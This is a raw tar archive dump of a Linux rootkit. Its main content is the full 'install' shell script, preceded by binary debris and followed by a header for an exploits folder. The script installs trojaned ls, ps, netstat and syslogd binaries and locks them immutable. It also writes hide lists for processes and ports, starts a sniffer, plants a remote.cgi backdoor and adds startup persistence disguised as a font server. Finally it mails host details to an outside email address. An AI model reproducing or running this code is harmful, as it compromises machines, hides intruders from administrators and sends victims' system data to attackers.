ø± Âtµ<¶8·ÿÿÿÿÿÿÿÿôÖΉÞ‰î‰þ‰ŠŠ.Š>ŠNŠ^ŠnŠ~ŠŽŠžŠ®Š¾ŠΊÞŠîŠþŠ‹‹.‹>‹N‹^‹n‹~‹Ž‹ž‹®‹¾‹΋Þ‹î‹þ‹ŒŒ.Œ>Œ °‰ @¸è€ †p‚  HÖ@hˆ8ˆ001.0101.0101.0101.0101.0101.0101.0101.0101.0101.0101.0101.0101.0101.01GCC: (GNU) 2.7.2.l.2GCC: (GNU) 2.7.2GCC: (GNU) 2.7.2GCC: (GNU) 2.7.2GCC: (GNU) 2.7.2GCC: (GNU) 2.7.2GCC: (GNU) 2.7.2GCC: (GNU) 2.7.2GCC: (GNU) 2.7.2GCC: (GNU) 2.7.2GCC: (GNU) 2.7.2GCC: (GNU) 2.7.2GCC: (GNU) 2.7.2GCC: (GNU) 2.7.2.l.2.symtab.strtab.shstrtab.interp.hash.dynsym.dynstr.rel.bss.rel.plt.init.plt.text.fini.rodata.data.ctors.dtors.got.dynamic.bss.note.commentÔ€Ô#è€èˆ) p‚p°1 † 9 8ˆ80B hˆh@K°‰° Q¸‰¸ VPŒP ð+\@¸@8bH¸H8Ç jÒB(p8Ö8Fw@Ö@F~HÖHF¬ƒôÖôFˆŒ|×|Gì‘|G—”H˜I rootkit/install0100775000101100010110000002042507634720051013243 0ustar hack3rhack3r#!/bin/sh unset HISTFILE unset HISTSAVE clear killall identd killall httpd BLK='' RED='' GRN='' YEL='' BLU='' MAG='' CYN='' WHI='' DRED='' DGRN='^[[0;32m' DYEL='' DBLU='' DMAG='' DCYN='' DWHI='' RES='' echo bla2=`pwd` echo "${GRN}###########################################################${RES}" echo "${GRN}# #${RES}" echo "${GRN}# [][][] [][][] [] [] [] [] [][][] [][][] [] [] [] [] #${RES}" echo "${GRN}# [] [] [] [][] [] [] [] [] [] [] [] [] [] [] #${RES}" echo "${GRN}# [][][] [] [] [] [][] [][] [][] [][][] [] [][] [] #${RES}" echo "${GRN}# [] [] [] [] [] [] [] [] [] [] [] [] [] [] #${RES}" echo "${GRN}# [][][] [][][] [] [] [] [] [][][] [] [] [] [] [] [] #${RES}" echo "${GRN}# #${RES}" echo "${GRN}# [][][] [][][] [][][] [][][] #${RES}" echo "${GRN}# [] [] [] [] [] [] [] #${RES}" echo "${GRN}# [][][] [] [] [] [] [] #${RES}" echo "${GRN}# [] [] [] [] [] [] [] #${RES}" echo "${GRN}# [] [] [][][] [][][] [] #${RES}" echo "${GRN}# #${RES}" echo "${GRN}###########################################################${RES}" echo sleep 3 chown root.root * echo "${GRN}###################${RES}" echo "${GRN}Installing firewall${RES}" echo "${GRN}###################${RES}" mkdir -p /usr/bin/.ftpd/.../ mv -f ess-0.8.6 /usr/bin/.ftpd/.../ echo "./ess $(hostname -f) scan.log" >>/usr/bin/.ftpd/.../ess-0.8.6/install chmod +x /usr/bin/.ftpd/.../ess-0.8.6/install /usr/bin/.ftpd/.../ess-0.8.6/install echo "${GRN}##### D O N E #####${RES}" echo sleep 3 echo "${GRN}############################${RES}" echo "${GRN}Installing trojaned binaries${RES}" echo "${GRN}############################${RES}" chattr -i /dev/s chattr -i /dev/udhss chattr -i /dev/s_h_k chattr -i /dev/s_r_s chattr -i /sbin/syslogd chattr -i /bin/ls chattr -i /usr/bin/pstree chattr -i /usr/bin/du chattr -i /bin/netstat chattr -i /usr/bin/killall chattr -i /bin/ps cp syslogd /sbin/ cp ls /bin/ cp pstree /usr/bin/ cp du /usr/bin/ cp netstat /bin/ cp killall /usr/bin/ cp ps /bin/ chattr +i /sbin/syslogd chattr +i /bin/ls chattr +i /usr/bin/pstree chattr +i /usr/bin/du chattr +i /bin/netstat chattr +i /usr/bin/killall chattr +i /bin/ps echo "${GRN}######### D O N E ########${RES}" echo sleep 3 echo "${GRN}#################${RES}" echo "${GRN}Hiding our tracks${RES}" echo "${GRN}#################${RES}" mv -f ptyxx /dev touch /dev/ptyxx/.proc >/dev/ptyxx/.proc echo "3 luckscan-a" >>/dev/ptyxx/.proc echo "3 luckstatdx" >>/dev/ptyxx/.proc echo "3 a" >>/dev/ptyxx/.proc echo "3 sense" >>/dev/ptyxx/.proc echo "3 firewall" >>/dev/ptyxx/.proc echo "3 udhss" >>/dev/ptyxx/.proc echo "3 goall" >>/dev/ptyxx/.proc echo "3 go" >>/dev/ptyxx/.proc echo "3 rula" >>/dev/ptyxx/.proc echo "3 killrk" >>/dev/ptyxx/.proc echo "3 linsniffer" >>/dev/ptyxx/.proc echo "3 sl2" >>/dev/ptyxx/.proc echo "3 sl3" >>/dev/ptyxx/.proc echo "3 slice" >>/dev/ptyxx/.proc echo "3 rhnsd" >>/dev/ptyxx/.proc echo "3 r00t" >>/dev/ptyxx/.proc echo "3 try" >>/dev/ptyxx/.proc echo "3 bind" >>/dev/ptyxx/.proc echo "3 wu" >>/dev/ptyxx/.proc echo "3 wroot" >>/dev/ptyxx/.proc echo "3 ide" >>/dev/ptyxx/.proc echo "3 idestatdx" >>/dev/ptyxx/.proc echo "3 idescan" >>/dev/ptyxx/.proc echo "3 scan" >>/dev/ptyxx/.proc echo "3 ssh" >>/dev/ptyxx/.proc echo "3 mech" >>/dev/ptyxx/.proc echo "3 darkbot" >>/dev/ptyxx/.proc echo "3 bnc" >>/dev/ptyxx/.proc echo "3 x" >>/dev/ptyxx/.proc echo "3 flood" >>/dev/ptyxx/.proc touch /dev/ptyxx/.addr >/dev/ptyxx/.addr echo "1 193" >>/dev/ptyxx/.addr echo "1 213" >>/dev/ptyxx/.addr echo "1 217" >>/dev/ptyxx/.addr echo "3 84" >>/dev/ptyxx/.addr echo "3 31337" >>/dev/ptyxx/.addr echo "3 15987" >>/dev/ptyxx/.addr echo "3 11111" >>/dev/ptyxx/.addr echo "3 3" >>/dev/ptyxx/.addr echo "3 33" >>/dev/ptyxx/.addr echo "3 333" >>/dev/ptyxx/.addr echo "3 3333" >>/dev/ptyxx/.addr echo "3 33333" >>/dev/ptyxx/.addr echo "3 6667" >>/dev/ptyxx/.addr echo "3 12547" >>/dev/ptyxx/.addr echo "4 31337" >>/dev/ptyxx/.addr echo "4 6667" >>/dev/ptyxx/.addr echo "4 84" >>/dev/ptyxx/.addr echo "4 15987" >>/dev/ptyxx/.addr echo "4 11111" >>/dev/ptyxx/.addr echo "4 3" >>/dev/ptyxx/.addr echo "4 33" >>/dev/ptyxx/.addr echo "4 333" >>/dev/ptyxx/.addr echo "4 3333" >>/dev/ptyxx/.addr echo "4 33333" >>/dev/ptyxx/.addr echo "4 12547" >>/dev/ptyxx/.addr touch /dev/ptyxx/.log >/dev/ptyxx/.log echo "r00t" >>/dev/ptyxx/.log echo "linsniffer" >>/dev/ptyxx/.log echo "sense" >>/dev/ptyxx/.log echo "rhnsd" >>/dev/ptyxx/.log echo "mech" >>/dev/ptyxx/.log echo "darkbot" >>/dev/ptyxx/.log echo "scan" >>/dev/ptyxx/.log echo "wu" >>/dev/ptyxx/.log echo "bind" >>/dev/ptyxx/.log echo "udhss" >>/dev/ptyxx/.log echo "rula" >>/dev/ptyxx/.log echo "patch" >>/dev/ptyxx/.log echo "firewall" >>/dev/ptyxx/.log echo "install" >>/dev/ptyxx/.log echo "a" >>/dev/ptyxx/.log echo "x" >>/dev/ptyxx/.log touch /dev/ptyxx/.file >/dev/ptyxx/.file echo "udhss" >>/dev/ptyxx/.file echo "rula" >>/dev/ptyxx/.file echo "s" >>/dev/ptyxx/.file echo "r00t" >>/dev/ptyxx/.file echo "${GRN}#### D O N E ####${RES}" echo sleep 3 echo "${GRN}######################${RES}" echo "${GRN}Creating homedirectory${RES}" echo "${GRN}######################${RES}" mv -f exploits /usr/bin/.ftpd/.../ mv -f flood /usr/bin/.ftpd/.../ mv -f curatare /usr/bin/.ftpd/.../ mv -f plasa /usr/bin/.ftpd/.../ mv -f scan /usr/bin/.ftpd/.../ mv -f secure /usr/bin/.ftpd/.../ cp killrk /usr/bin/.ftpd/.../ cp firewall /usr/bin/.ftpd/.../ cp vanish2.tgz /usr/bin/.ftpd/.../ cp s /dev/ cp udhss /dev/ cp s_h_k /dev/ cp s_r_s /dev/ chattr -i /etc/rc.d/init.d/sshd cp sshd /etc/rc.d/init.d/ /etc/rc.d/init.d/sshd stop /usr/bin/.ftpd/.../plasa/linsniffer >tcp.log rm -rf /usr/sbin/*statd* rm -rf /sbin/*statd* rm -rf /usr/sbin/amd rm -rf /sbin/amd echo "${GRN}###### D O N E ######${RES}" echo sleep 3 echo "${GRN}#######${RES}" echo "${GRN}Startup${RES}" echo "${GRN}#######${RES}" echo "# X Font Server ..." >> /etc/rc.d/rc.sysinit echo "/usr/bin/rula -t1 -X53 -p" >> /etc/rc.d/rc.sysinit echo >> /etc/rc.d/rc.sysinit chattr -i /usr/bin/rula mv rula -f /usr/bin/ chmod 500 /usr/bin/rula chattr +i /usr/bin/rula /usr/bin/rula chattr -i /etc/rc.d/rc.local echo "/usr/bin/rula" >>/etc/rc.d/rc.local chattr +i /dev/udhss echo "${GRN}# D O N E #${RES}" echo sleep 3 echo "${GRN}########${RES}" echo "${GRN}Cleaning${RES}" echo "${GRN}########${RES}" sleep 1 if [ -d /home/httpd/cgi-bin ] then mv -f remote.cgi /home/httpd/cgi-bin/ fi if [ -d /usr/local/httpd/cgi-bin ] then mv -f remote.cgi /usr/local/httpd/cgi-bin/ fi if [ -d /usr/local/apache/cgi-bin ] then mv -f remote.cgi /usr/local/apache/cgi-bin/ fi if [ -d /www/httpd/cgi-bin ] then mv -f remote.cgi /www/httpd/cgi-bin/ fi if [ -d /www/cgi-bin ] then mv -f remote.cgi /www/cgi-bin/ fi chattr +i /dev/s chattr +i /dev/awd chattr +i /dev/s_h_k chattr +i /dev/s_r_s chattr +i /etc/rc.d/rc.sysinit chattr +i /etc/rc.d/rc.local cd .. rm -rf rootkit rootkit.tar.gz echo "${GRN}# D O N E #${RES}" echo sleep 3 echo "${GRN}###################${RES}" echo "${GRN}Mailing system info${RES}" echo "${GRN}###################${RES}" echo "* Info : $(uname -a)" >> /tmp/info echo "* Hostname : $(hostname -f)" >> /tmp/info echo "* IfConfig : $(/sbin/ifconfig | grep inet)" >> /tmp/info echo "* Uptime : $(uptime)" >> /tmp/info echo "* Cpu Vendor ID : $(cat /proc/cpuinfo|grep vendor_id)" >> /tmp/info echo "* Cpu Model : $(cat /proc/cpuinfo|grep model)" >> /tmp/info echo "* Cpu Speed: $(cat /proc/cpuinfo|grep MHz)" >> /tmp/info echo "* Bogomips: $(cat /proc/cpuinfo|grep bogomips)" >> /tmp/info echo "* Disk Space: $(df -h)" >> /tmp/info echo "* Yahoo Ping Reply: $(ping -c3 yahoo.com)" >> /tmp/info echo "* Password: $(wc /etc/passwd -l)" >> /tmp/info echo "* Port: 6668" >> /tmp/info cat /tmp/info | mail -s "SoNkErIkI HaCk" jijeljijel@yahoo.com rm -rf /tmp/info echo "${GRN}##### D O N E #####${RES}" echo sleep 3 echo "${GRN}#################################################${RES}" echo "${GRN}# D O N E - R O O T K I T I N S T A L L E D #${RES}" echo "${GRN}#################################################${RES}" rootkit/exploits/0040755000101100010110000000000007372425123013515 5ustar hack3rhack3rrootkit/exploits/sendmailx.sh0100644000101100010110000000406407304755643016046 0ustar hack3rhack3r